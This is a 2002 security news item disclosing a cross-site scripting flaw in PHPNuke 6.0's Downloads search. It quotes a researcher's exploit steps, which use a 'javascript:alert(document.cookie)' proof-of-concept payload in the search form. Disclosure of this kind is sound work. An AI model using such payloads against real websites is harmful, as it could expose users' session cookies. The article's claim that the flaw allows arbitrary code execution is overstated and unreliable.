Home » Hacking News » PHPNuke 6.0 XSS vulnerability

PHPNuke 6.0 XSS vulnerability

by Nikola Strahija on October 11th, 2002 Arab Vieruz has found an XSS flaw in PHPNuke 6.0, a widely used open-source CMS, which, if exploited, could allow arbitrary code execution.

Arab Vieruz's e-mail message
----------------------------------

Exploit:
1- go to http://[traget]/modules.php?name=Downloads&d_op=search

2- put in form search this code :

javascript:alert(document.cookie)

3- click "Search"

(without "*")

you can't use it an URL like this

http://[traget]/modules.php?
name=Downloads&d_op=search&query=javascript:alert(document.cookie)

----------------------------------

From the forum

The forums are now OPEN AGAIN!

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Users login

JOIN XATRIX

PHPNuke 6.0 XSS vulnerability

Related articles

Advisories

Vulnerabilities

From the forum

Newsletter signup

Free E-books

Contact